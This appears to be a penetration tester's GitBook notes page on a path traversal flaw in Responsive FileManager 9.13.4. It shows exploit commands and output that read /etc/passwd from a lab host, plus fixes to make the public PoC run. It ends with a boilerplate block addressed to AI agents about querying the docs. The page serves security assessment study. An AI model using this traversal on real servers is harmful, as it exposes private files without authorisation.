# Responsive Filemanager Responsive FileManager is a web-based file management plugin designed to integrate with rich text editors like TinyMCE or CKEditor. It provides an interface for uploading, browsing, renaming, and managing files and directories on the server through a browser. This tool is commonly used in content management systems (CMS) and custom web applications to allow users or administrators to handle media assets and documents. When improperly configured or left unpatched, it can expose sensitive file operations directly to the web, making it a potential attack surface during a web application assessment. ## LFI Version `9.13.4` and earlier has improper input validation on the `path` parameter. This allows attackers with a valid session (**authenticated** access) to perform **directory traversal** by injecting relative path sequences such as `../../..`, effectively escaping the intended file browsing directory and accessing arbitrary files on the server. {% code overflow="wrap" %} ```bash $ searchsploit responsive file manager 9.13.4 Responsive FileManager 9.13.4 - 'path' Path Traversal | php/webapps/49359.py $ python3 49359.py http:///filemanager PHPSESSID= /etc/passwd [*] Copy Clipboard [-] Paste False UnboundLocalError: cannot access local variable 'paste_result' where it is not associated with a value # Check the paths on the below functions def paste_clipboard(url, session_cookie): # Changed path url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url) def read_file(url, file_name): # Changed path url_path = "%s/filemanager/Documents/%s" % (url,name_file) # Successful execution of the PoC will copy the target file within Documents (can be seen on the UI or in an SMB share in case of a PHP file $ python3 49359.py http://apex PHPSESSID=vk5ofpj43e0ph77modoki4uo1s /etc/passwd ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tl-dr/web/applications/responsive-filemanager.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.